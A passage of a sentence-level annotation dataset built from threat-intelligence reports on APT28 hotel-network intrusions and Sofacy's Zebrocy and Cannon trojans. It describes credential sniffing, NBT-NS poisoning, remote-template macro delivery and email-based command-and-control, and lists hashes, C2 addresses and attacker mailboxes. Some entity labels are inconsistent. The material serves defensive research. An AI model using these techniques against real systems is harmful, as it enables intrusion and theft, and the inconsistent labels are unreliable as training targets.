337, "end": 370, "label": "Indicator"}]} {"text": "APT28 Targets Hospitality Sector , Presents Threat to Travelers .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "Release_Time : 2017-08-11 Report_URL : https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "spans": []} {"text": "FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 112, "end": 117, "label": "Organization"}]} {"text": "We believe this activity , which dates back to at least July 2017 , was intended to target travelers to hotels throughout Europe and the Middle East .", "spans": []} {"text": "The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic , poisoning the NetBIOS Name Service , and spreading laterally via the EternalBlue exploit .", "spans": [{"start": 73, "end": 91, "label": "System"}, {"start": 97, "end": 110, "label": "System"}, {"start": 127, "end": 147, "label": "System"}, {"start": 182, "end": 193, "label": "Vulnerability"}]} {"text": "FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry , including hotels in at least seven European countries and one Middle Eastern country in early July .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Successful execution of the macro within the malicious document results in the installation of APT28 \u2019s signature GAMEFISH malware .", "spans": [{"start": 28, "end": 33, "label": "System"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 114, "end": 122, "label": "Malware"}]} {"text": "The malicious document \u2013 Hotel_Reservation_Form.doc ( MD5 : 9b10685b774a783eabfecdb6119a8aa3 ) , contains a macro that base64 decodes a dropper that then deploys APT28 \u2019s signature GAMEFISH malware ( 
MD5 : 1421419d1be31f1f9ea60e8ed87277db ) , which uses mvband.net and mvtband.net as command and control ( C2 ) domains .", "spans": [{"start": 25, "end": 51, "label": "Indicator"}, {"start": 60, "end": 92, "label": "Indicator"}, {"start": 108, "end": 113, "label": "System"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 181, "end": 189, "label": "Malware"}, {"start": 206, "end": 238, "label": "Indicator"}, {"start": 254, "end": 264, "label": "Indicator"}, {"start": 269, "end": 280, "label": "Indicator"}, {"start": 284, "end": 303, "label": "System"}, {"start": 306, "end": 308, "label": "System"}]} {"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 46, "end": 57, "label": "Vulnerability"}, {"start": 91, "end": 100, "label": "System"}]} {"text": "Once inside the network of a hospitality company , APT28 sought out machines that controlled both guest and internal Wi-Fi networks .", "spans": [{"start": 51, "end": 56, "label": "Organization"}, {"start": 117, "end": 131, "label": "System"}]} {"text": "No guest credentials were observed being stolen at the compromised hotels ; however , in a separate incident that occurred in Fall 2016 , APT28 gained initial access to a victim \u2019s network via credentials likely stolen from a hotel Wi-Fi network .", "spans": [{"start": 138, "end": 143, "label": "Organization"}, {"start": 232, "end": 245, "label": "System"}]} {"text": "Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder .", "spans": [{"start": 69, "end": 83, "label": "System"}, {"start": 86, "end": 91, "label": "Organization"}, {"start": 101, "end": 110, "label": "System"}]} {"text": "Responder facilitates NetBIOS Name Service ( NBT-NS ) poisoning .", "spans": [{"start": 0, "end": 9, "label": 
"System"}, {"start": 22, "end": 42, "label": "System"}, {"start": 45, "end": 51, "label": "System"}]} {"text": "This technique listens for NBT-NS ( UDP ) broadcasts from victim computers attempting to connect to network resources .", "spans": [{"start": 27, "end": 33, "label": "System"}, {"start": 36, "end": 39, "label": "Indicator"}]} {"text": "Once received , Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine .", "spans": [{"start": 16, "end": 25, "label": "System"}]} {"text": "APT28 used this technique to steal usernames and hashed passwords that allowed escalation of privileges in the victim network .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "To spread through the hospitality company \u2019s network , APT28 used a version of the EternalBlue SMB exploit .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 83, "end": 94, "label": "Vulnerability"}, {"start": 95, "end": 98, "label": "Indicator"}]} {"text": "This was combined with the heavy use of py2exe to compile Python scripts .", "spans": [{"start": 40, "end": 46, "label": "System"}, {"start": 58, "end": 64, "label": "System"}]} {"text": "This is the first time we have seen APT28 incorporate this exploit into their intrusions .", "spans": [{"start": 36, "end": 41, "label": "Organization"}]} {"text": "In the 2016 incident , the victim was compromised after connecting to a hotel Wi-Fi network .", "spans": [{"start": 78, "end": 91, "label": "System"}]} {"text": "Twelve hours after the victim initially connected to the publicly available Wi-Fi network , APT28 logged into the machine with stolen credentials .", "spans": [{"start": 76, "end": 89, "label": "System"}, {"start": 92, "end": 97, "label": "Organization"}]} {"text": "These 12 hours could have been used to crack a hashed password offline .", "spans": []} {"text": "After successfully accessing the machine 
, the attacker deployed tools on the machine , spread laterally through the victim's network , and accessed the victim's OWA account .", "spans": [{"start": 162, "end": 165, "label": "System"}]} {"text": "The login originated from a computer on the same subnet , indicating that the attacker machine was physically close to the victim and on the same Wi-Fi network .", "spans": [{"start": 146, "end": 159, "label": "System"}]} {"text": "We cannot confirm how the initial credentials were stolen in the 2016 incident ; however , later in the intrusion , Responder was deployed .", "spans": [{"start": 116, "end": 125, "label": "System"}]} {"text": "Since this tool allows an attacker to sniff passwords from network traffic , it could have been used on the hotel Wi-Fi network to obtain a user \u2019s credentials .", "spans": [{"start": 59, "end": 74, "label": "System"}, {"start": 114, "end": 127, "label": "System"}]} {"text": "Cyber espionage activity against the hospitality industry is typically focused on collecting information on or from hotel guests of interest rather than on the hotel industry itself , though actors may also collect information on the hotel as a means of facilitating operations .", "spans": []} {"text": "Business and government personnel who are traveling , especially in a foreign country , often rely on systems to conduct business other than those at their home office , and may be unfamiliar with threats posed while abroad .", "spans": []} {"text": "APT28 isn\u2019t the only group targeting travelers .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "South Korea nexus Fallout Team ( aka Darkhotel ) has used spoofed software updates on infected Wi-Fi networks in Asian hotels , and Duqu 2.0 malware has been found on the networks of European hotels used by participants in the Iranian nuclear negotiations .", "spans": [{"start": 18, "end": 30, "label": "Organization"}, {"start": 37, "end": 46, "label": "Organization"}, {"start": 95, 
"end": 109, "label": "System"}, {"start": 132, "end": 140, "label": "Malware"}]} {"text": "Additionally , open sources have reported for several years that in Russia and China , high-profile hotel guests may expect their hotel rooms to be accessed and their laptops and other electronic devices accessed .", "spans": []} {"text": "These incidents show a novel infection vector being used by APT28 .", "spans": [{"start": 60, "end": 65, "label": "Organization"}]} {"text": "The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges .", "spans": [{"start": 42, "end": 56, "label": "System"}, {"start": 84, "end": 104, "label": "Organization"}]} {"text": "APT28 \u2019s already wide-ranging capabilities and tactics are continuing to grow and refine as the group expands its infection vectors .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "Travelers must be aware of the threats posed when traveling \u2013 especially to foreign countries \u2013 and take extra precautions to secure their systems and data .", "spans": []} {"text": "Publicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible .", "spans": [{"start": 20, "end": 34, "label": "System"}]} {"text": "Sofacy Continues Global Attacks and Wheels Out New Cannon Trojan .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 51, "end": 57, "label": "System"}, {"start": 58, "end": 64, "label": "Malware"}]} {"text": "Release_Time : 2018-11-20", "spans": []} {"text": "Report_URL : https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", "spans": []} {"text": "In late October and early November 2018 , Unit 42 intercepted a series of weaponized documents that use a technique to load remote templates containing a malicious macro .", "spans": [{"start": 42, "end": 49, "label": "Organization"}, {"start": 154, "end": 
169, "label": "System"}]} {"text": "These types of weaponized documents are not uncommon but are more difficult to identify as malicious by automated analysis systems due to their modular nature .", "spans": []} {"text": "Specific to this technique , if the C2 server is not available at the time of execution , the malicious code cannot be retrieved , rendering the delivery document largely benign .", "spans": [{"start": 36, "end": 38, "label": "System"}]} {"text": "The weaponized documents targeted several government entities around the globe , including North America , Europe , and a former USSR state .", "spans": []} {"text": "Fortunately for us , the C2 servers for several of these documents were still operational allowing for retrieval of the malicious macro and the subsequent payloads .", "spans": [{"start": 25, "end": 27, "label": "System"}, {"start": 120, "end": 135, "label": "System"}]} {"text": "Analysis revealed a consistent first-stage payload of the well-documented Zebrocy Trojan .", "spans": [{"start": 74, "end": 81, "label": "Malware"}, {"start": 82, "end": 88, "label": "Malware"}]} {"text": "Additional collection of related documents revealed a second first-stage payload that we have named \u2018 Cannon \u2019 .", "spans": [{"start": 102, "end": 108, "label": "Malware"}]} {"text": "Cannon has not been previously observed in use by the Sofacy group and contains a novel email-based C2 communication channel .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 100, "end": 102, "label": "System"}]} {"text": "email as a C2 channel is not a new tactic , but it is generally not observed in the wild as often as HTTP or HTTPS .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 11, "end": 13, "label": "System"}, {"start": 101, "end": 105, "label": "Indicator"}, {"start": 109, "end": 114, "label": "Indicator"}]} {"text": "Using email as a C2 channel may also decrease the chance of 
detection , as sending email via non-sanctioned email providers may not necessarily construe suspicious or even malicious activity in many enterprises .", "spans": [{"start": 6, "end": 11, "label": "System"}, {"start": 17, "end": 19, "label": "System"}, {"start": 83, "end": 88, "label": "System"}, {"start": 108, "end": 113, "label": "System"}]} {"text": "The activity discussed in this blog revolves around two of the multitude of weaponized documents that we collected .", "spans": []} {"text": "These two documents shared multiple data artifacts , such as a shared C2 IP , shared author name , and shared tactics .", "spans": [{"start": 70, "end": 72, "label": "System"}]} {"text": "Details of the extended attack campaign associated with the Cannon Trojan will be discussed in a later blog .", "spans": [{"start": 60, "end": 66, "label": "Malware"}, {"start": 67, "end": 73, "label": "Malware"}]} {"text": "A particularly interesting aspect of one of the two documents we analyzed was the filename used , crash list ( Lion Air Boeing 737 ).docx .", "spans": [{"start": 98, "end": 137, "label": "Indicator"}]} {"text": "This is not the first instance of an adversary group using recent current events as a lure , but it is interesting to see this group attempt to capitalize on the attention of a catastrophic event to execute their attack .", "spans": []} {"text": "The initial sample we intercepted was a Microsoft Word document ( SHA256 : 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f ) with the filename crash list ( Lion Air Boeing 737 ).docx using the author name Joohn .", "spans": [{"start": 40, "end": 49, "label": "Organization"}, {"start": 50, "end": 54, "label": "System"}, {"start": 75, "end": 139, "label": "Indicator"}, {"start": 160, "end": 199, "label": "Indicator"}]} {"text": "This document appeared to be targeting a government organization dealing with foreign affairs in Europe via spear-phishing .", "spans": []} {"text": "Once the user attempts to open 
the document , Microsoft Word immediately attempts to load the remote template containing a malicious macro and payload from the location specified within the settings.xml.rels file of the DOCX document .", "spans": [{"start": 46, "end": 55, "label": "Organization"}, {"start": 56, "end": 60, "label": "System"}, {"start": 123, "end": 138, "label": "System"}, {"start": 190, "end": 207, "label": "Indicator"}, {"start": 220, "end": 224, "label": "System"}]} {"text": "If the C2 has already been taken offline the document will still open , but Word will be unable to retrieve the remote template and thus Word will not load a macro .", "spans": [{"start": 7, "end": 9, "label": "System"}, {"start": 76, "end": 80, "label": "System"}, {"start": 137, "end": 141, "label": "System"}, {"start": 158, "end": 163, "label": "System"}]} {"text": "In this situation , Word will present the same lure document to the victim as seen in Figure 2 , but without the ability to enable macros via an Enable Content button .", "spans": [{"start": 20, "end": 24, "label": "System"}, {"start": 131, "end": 137, "label": "System"}, {"start": 145, "end": 166, "label": "System"}]} {"text": "Assuming the C2 is still operational however , Word loads the remote template ( SHA256 : f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5 ) and the user is presented with the screen .", "spans": [{"start": 13, "end": 15, "label": "System"}, {"start": 47, "end": 51, "label": "System"}, {"start": 89, "end": 153, "label": "Indicator"}]} {"text": "Once the victim presses the Enable content button , the embedded macro is executed .", "spans": [{"start": 28, "end": 49, "label": "System"}, {"start": 65, "end": 70, "label": "System"}]} {"text": "The macros used for these delivery documents use a less common method of using the AutoClose function .", "spans": [{"start": 4, "end": 10, "label": "System"}]} {"text": "This is a form of anti-analysis as Word will not fully execute the malicious code until the user 
closes the document .", "spans": [{"start": 35, "end": 39, "label": "System"}]} {"text": "If an automated sandbox exits its analysis session without specifically closing out the document , the sandbox may miss the malicious activity entirely .", "spans": []} {"text": "Once successfully executed , the macro will install a payload and save a document to the system .", "spans": [{"start": 33, "end": 38, "label": "System"}]} {"text": "Typically , we expect to see a decoy document saved to the system and later displayed to make the victim less suspicious of malicious activity ; however , in this case the document saved to the system was never displayed and does not contain any pertinent content to the Lion Air tragedy theme seen in the filename .", "spans": [{"start": 271, "end": 279, "label": "Organization"}]} {"text": "The macro obtains the document saved to the system from within the document stored as UserForm1.Label1.Caption and will write it to : %TEMP%\\~temp.docm .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 86, "end": 110, "label": "Indicator"}, {"start": 134, "end": 151, "label": "Indicator"}]} {"text": "The macro obtains the payload saved to the system from within the document stored as UserForm1.Label2.Caption and will write it to : %APPDATA%\\MSDN\\~msdn.exe .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 85, "end": 109, "label": "Indicator"}, {"start": 133, "end": 157, "label": "Indicator"}]} {"text": "The macro executes this payload in a rather interesting way by loading the dropped ~temp.docm document and calling a function within its embedded macro to run the payload .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 83, "end": 93, "label": "Indicator"}]} {"text": "We believe the creator of this delivery document chose to run the payload from the dropped file as an evasion technique .", "spans": []} {"text": "Also , the fact the initial macro uses this dropped document for the execution of the 
payload may also explain why the document did not contain any decoy contents .", "spans": [{"start": 28, "end": 33, "label": "System"}]} {"text": "To carry out this functionality , after writing the", "spans": []} {"text": "~temp.docm and ~msdn.exe files to the system , the initial macro will load the ~temp.docm file as a Word Document object and attempts to run the function Proc1 in the Module1 macro within the ~temp.docm file .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 15, "end": 24, "label": "Indicator"}, {"start": 59, "end": 64, "label": "System"}, {"start": 79, "end": 89, "label": "Indicator"}, {"start": 100, "end": 104, "label": "System"}, {"start": 175, "end": 180, "label": "System"}, {"start": 192, "end": 202, "label": "Indicator"}]} {"text": "The Proc1 function within the Module1 does nothing more than build the %APPDATA%\\MSDN\\~msdn.exe path to the dropped payload and executes it using the built-in Shell function .", "spans": [{"start": 71, "end": 95, "label": "Indicator"}]} {"text": "The payload dropped to the system ( SHA256 : 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a ) is a UPX packed Zebrocy variant written in the Delphi language .", "spans": [{"start": 45, "end": 109, "label": "Indicator"}, {"start": 117, "end": 120, "label": "System"}, {"start": 128, "end": 135, "label": "Malware"}, {"start": 159, "end": 165, "label": "System"}]} {"text": "This variant of Zebrocy is functionally very similar to the Delphi based payloads discussed in our previous publication on Sofacy attacks using Zebrocy earlier this year .", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 60, "end": 66, "label": "System"}, {"start": 123, "end": 129, "label": "Organization"}, {"start": 144, "end": 151, "label": "Malware"}]} {"text": "The developer of this particular payload configured it to use the following URL to communicate with as its C2 : http://188.241.58.170/local/s3/filters.php .", "spans": [{"start": 107, 
"end": 109, "label": "System"}, {"start": 112, "end": 154, "label": "Indicator"}]} {"text": "The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 12, "end": 18, "label": "Malware"}, {"start": 80, "end": 82, "label": "System"}]} {"text": "Like other Zebrocy samples , this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 34, "end": 40, "label": "Malware"}, {"start": 98, "end": 100, "label": "System"}]} {"text": "This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server .", "spans": [{"start": 25, "end": 32, "label": "Malware"}, {"start": 85, "end": 89, "label": "System"}, {"start": 103, "end": 105, "label": "System"}]} {"text": "The C2 server will then provide a secondary payload to the beacon in ASCII hexadecimal representation , which the Trojan will decode and write to the following location : %APPDATA%\\Roaming\\Audio\\soundfix.exe .", "spans": [{"start": 4, "end": 6, "label": "System"}, {"start": 69, "end": 74, "label": "System"}, {"start": 114, "end": 120, "label": "Malware"}, {"start": 171, "end": 207, "label": "Indicator"}]} {"text": "During our analysis , the C2 server provided a secondary payload that functionally appeared similar to the initial Zebrocy sample .", "spans": [{"start": 26, "end": 28, "label": "System"}, {"start": 115, "end": 122, "label": "Malware"}]} {"text": "The secondary payload was also written in Delphi and its developer configured it to communicate with its C2 server using HTTPS via the following URL : https://200.122.181.25/catalog/products/books.php .", "spans": [{"start": 42, "end": 48, "label": "System"}, 
{"start": 105, "end": 107, "label": "System"}, {"start": 121, "end": 126, "label": "Indicator"}, {"start": 151, "end": 200, "label": "Indicator"}]} {"text": "We were able to collect a second delivery document that shared the Joohn author from the crash list ( Lion Air Boeing 737 ).docx document , as well as the 188.241.58.170 C2 IP to host its remote template .", "spans": [{"start": 89, "end": 128, "label": "Indicator"}, {"start": 155, "end": 169, "label": "Indicator"}, {"start": 170, "end": 172, "label": "System"}]} {"text": "Structurally this sample was very similar to the initially analyzed document , but the payload turned out to be a completely new tool which we have named Cannon .", "spans": [{"start": 154, "end": 160, "label": "Malware"}]} {"text": "The tool is written in C# whose malicious code exists in a namespace called cannon , which is the basis of the Trojan \u2019s name .", "spans": [{"start": 23, "end": 25, "label": "System"}, {"start": 76, "end": 82, "label": "Malware"}, {"start": 111, "end": 117, "label": "Malware"}]} {"text": "The Trojan functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 62, "end": 68, "label": "System"}, {"start": 96, "end": 102, "label": "Malware"}, {"start": 111, "end": 113, "label": "System"}]} {"text": "To communicate with the C2 server , the Trojan will send emails to specific email addresses via SMTPS over TCP port 587 .", "spans": [{"start": 24, "end": 26, "label": "System"}, {"start": 40, "end": 46, "label": "Malware"}, {"start": 57, "end": 63, "label": "System"}, {"start": 76, "end": 81, "label": "System"}, {"start": 96, "end": 101, "label": "Indicator"}, {"start": 107, "end": 110, "label": "Indicator"}]} {"text": "This tool also has a heavy reliance on EventHandlers with timers to run its methods in a specific order and potentially increase its evasion capability .", "spans": []} {"text": "The 
overall purpose of Cannon is to use several email accounts to send system data ( system information and screenshot ) to the threat actors and to ultimately obtain a payload from an email from the actors .", "spans": [{"start": 23, "end": 29, "label": "Malware"}, {"start": 48, "end": 53, "label": "System"}, {"start": 185, "end": 190, "label": "System"}]} {"text": "In addition to the following step-by-step process illustrates how Cannon communicates with the actor-controlled C2 email address to obtain a secondary payload .", "spans": [{"start": 66, "end": 72, "label": "Malware"}, {"start": 112, "end": 114, "label": "System"}, {"start": 115, "end": 120, "label": "System"}]} {"text": "Cannon gathers system information and saves it to a file named ini .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]} {"text": "The Trojan sends an email to sahro.bella7@post.cz with i.ini as the attachment , S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts : Bishtr.cam47 , Lobrek.chizh , Cervot.woprov .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 20, "end": 25, "label": "System"}, {"start": 29, "end": 49, "label": "Indicator"}, {"start": 55, "end": 60, "label": "Indicator"}, {"start": 153, "end": 158, "label": "Indicator"}, {"start": 196, "end": 208, "label": "Indicator"}, {"start": 211, "end": 223, "label": "Indicator"}, {"start": 226, "end": 239, "label": "Indicator"}]} {"text": "Cannon takes a screenshot and saves it to a file named ops .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]} {"text": "The Trojan sends an email to sahro.bella7@post.cz with sysscr.ops as the attachment , the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 20, "end": 25, "label": "System"}, {"start": 29, "end": 49, "label": "Indicator"}, {"start": 55, "end": 
65, "label": "Indicator"}, {"start": 172, "end": 177, "label": "Indicator"}]} {"text": "The actors likely log into sahro.bella7@post.cz and process the system information and screenshot sent by the Trojan to determine if the compromised host is of interest .", "spans": [{"start": 27, "end": 47, "label": "Indicator"}, {"start": 110, "end": 116, "label": "Malware"}]} {"text": "If the actor wishes to download an additional payload to the compromised host , they will respond by sending emails in the following steps .", "spans": [{"start": 109, "end": 115, "label": "System"}]} {"text": "The actor sends an email to trala.cosh2@post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body .", "spans": [{"start": 19, "end": 24, "label": "System"}, {"start": 28, "end": 47, "label": "Indicator"}, {"start": 112, "end": 117, "label": "System"}, {"start": 145, "end": 150, "label": "System"}]} {"text": "This secondary email account is unknown at this time , so we will refer to it as \u201c secondary email account \u201d in future steps .", "spans": [{"start": 15, "end": 20, "label": "System"}, {"start": 93, "end": 98, "label": "System"}]} {"text": "The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt .", "spans": [{"start": 19, "end": 24, "label": "System"}, {"start": 42, "end": 47, "label": "System"}, {"start": 156, "end": 159, "label": "System"}]} {"text": "Cannon logs into the trala.cosh2@post.cz account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 21, "end": 40, "label": "Indicator"}, {"start": 53, "end": 58, "label": "Indicator"}, {"start": 71, "end": 77, "label": "System"}]} {"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the 
body of the message to obtain the secondary email account .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 17, "end": 22, "label": "System"}, {"start": 132, "end": 137, "label": "System"}]} {"text": "Cannon acknowledges the receipt of the secondary email address by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 49, "end": 54, "label": "System"}, {"start": 77, "end": 82, "label": "System"}, {"start": 86, "end": 106, "label": "Indicator"}, {"start": 112, "end": 117, "label": "Indicator"}, {"start": 243, "end": 248, "label": "Indicator"}]} {"text": "The actor sends an email to trala.cosh2@post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload .", "spans": [{"start": 19, "end": 24, "label": "System"}, {"start": 28, "end": 47, "label": "Indicator"}, {"start": 121, "end": 127, "label": "Malware"}, {"start": 128, "end": 134, "label": "Malware"}]} {"text": "Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 31, "end": 36, "label": "System"}, {"start": 49, "end": 54, "label": "Indicator"}, {"start": 67, "end": 73, "label": "System"}]} {"text": "Cannon opens the email with the correct subject and saves the attachment named auddevc.txt .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 17, "end": 22, "label": "System"}, {"start": 79, "end": 90, "label": "Indicator"}]} {"text": "Cannon acknowledges the receipt of file download by sending an email to sahro.bella7@post.cz with l.txt ( contains 090 string ) as the attachment , ok2 within the body and a subject with the unique 
system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 63, "end": 68, "label": "System"}, {"start": 72, "end": 92, "label": "Indicator"}, {"start": 98, "end": 103, "label": "Indicator"}, {"start": 220, "end": 225, "label": "Indicator"}]} {"text": "Cannon logs into the trala.cosh2@post.cz account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 21, "end": 40, "label": "Indicator"}, {"start": 53, "end": 58, "label": "Indicator"}, {"start": 71, "end": 77, "label": "System"}]} {"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 17, "end": 22, "label": "System"}, {"start": 172, "end": 183, "label": "Indicator"}]} {"text": "Cannon acknowledges the receipt of file path by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok3 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 59, "end": 64, "label": "System"}, {"start": 68, "end": 88, "label": "Indicator"}, {"start": 94, "end": 99, "label": "Indicator"}, {"start": 226, "end": 231, "label": "Indicator"}]} {"text": "Cannon moves the downloaded file to the specified path .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]} {"text": "Cannon acknowledges the successful move by sending an email to sahro.bella7@post.cz with l.txt ( contains 090 string ) as the attachment , ok4 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": 
"Malware"}, {"start": 54, "end": 59, "label": "System"}, {"start": 63, "end": 83, "label": "Indicator"}, {"start": 89, "end": 94, "label": "Indicator"}, {"start": 211, "end": 216, "label": "Indicator"}]} {"text": "Cannon runs the downloaded file from the specified path .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]} {"text": "Cannon acknowledges the successful execution by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok5 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 59, "end": 64, "label": "System"}, {"start": 68, "end": 88, "label": "Indicator"}, {"start": 94, "end": 99, "label": "Indicator"}, {"start": 226, "end": 231, "label": "Indicator"}]} {"text": "The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 126, "end": 133, "label": "Malware"}]} {"text": "In these attacks , the delivery documents used to install Zebrocy used remote templates , which increases the difficulty to analyze the attack as an active C2 server is needed to obtain the macro-enabled document .", "spans": [{"start": 58, "end": 65, "label": "Malware"}, {"start": 156, "end": 158, "label": "System"}]} {"text": "The Sofacy group also leveraged the recent Lion Air disaster as a lure in one of these attacks , which continues to show a willingness to use current events in their social engineering themes .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]} {"text": "Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon .", "spans": [{"start": 33, "end": 39, "label": "Organization"}, {"start": 102, "end": 108, "label": "Malware"}, {"start": 116, 
"end": 122, "label": "Malware"}]} {"text": "Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 17, "label": "Indicator"}, {"start": 22, "end": 27, "label": "Indicator"}, {"start": 35, "end": 37, "label": "System"}, {"start": 58, "end": 65, "label": "Malware"}, {"start": 101, "end": 105, "label": "Indicator"}, {"start": 109, "end": 114, "label": "Indicator"}, {"start": 121, "end": 123, "label": "System"}]} {"text": "This is not a new tactic but may be more effective at evading detection as the external hosts involved are a legitimate email service provider .", "spans": [{"start": 120, "end": 125, "label": "System"}]} {"text": "Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block While Sofacy \u2019s campaign delivering Zebrocy and Cannon remains active , Palo Alto Networks customers are protected from this threat in the following ways :", "spans": [{"start": 37, "end": 42, "label": "Indicator"}, {"start": 47, "end": 52, "label": "Indicator"}, {"start": 137, "end": 139, "label": "System"}, {"start": 163, "end": 169, "label": "Organization"}, {"start": 193, "end": 200, "label": "Malware"}, {"start": 205, "end": 211, "label": "Malware"}, {"start": 229, "end": 247, "label": "Organization"}]} {"text": "AutoFocus customers can track these samples with the Zebrocy and Cannon WildFire detects the delivery documents , Zebrocy and Cannon payloads discussed in this blog with malicious verdicts .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 53, "end": 60, "label": "Malware"}, {"start": 65, "end": 71, "label": "Malware"}, {"start": 72, "end": 80, "label": "Organization"}, {"start": 114, "end": 121, "label": "Malware"}, {"start": 126, "end": 132, "label": "Malware"}]} {"text": "Traps blocks the 
macro-ladened remote templates as Suspicious macro detected , as well as Zebrocy and Cannon payloads as Suspicious executable detected .", "spans": [{"start": 62, "end": 67, "label": "System"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 102, "end": 108, "label": "Malware"}]} {"text": "The IP addresses hosting remote templates and C2 services in these attacks are classified as Command and Control .", "spans": [{"start": 46, "end": 48, "label": "System"}, {"start": 93, "end": 112, "label": "System"}]} {"text": "Delivery Hashes :", "spans": []} {"text": "2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f af77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}]} {"text": "Remote Template Hashes :", "spans": [{"start": 0, "end": 15, "label": "System"}]} {"text": "f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5 fc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}]} {"text": "Remote Templates :", "spans": [{"start": 0, "end": 16, "label": "System"}]} {"text": 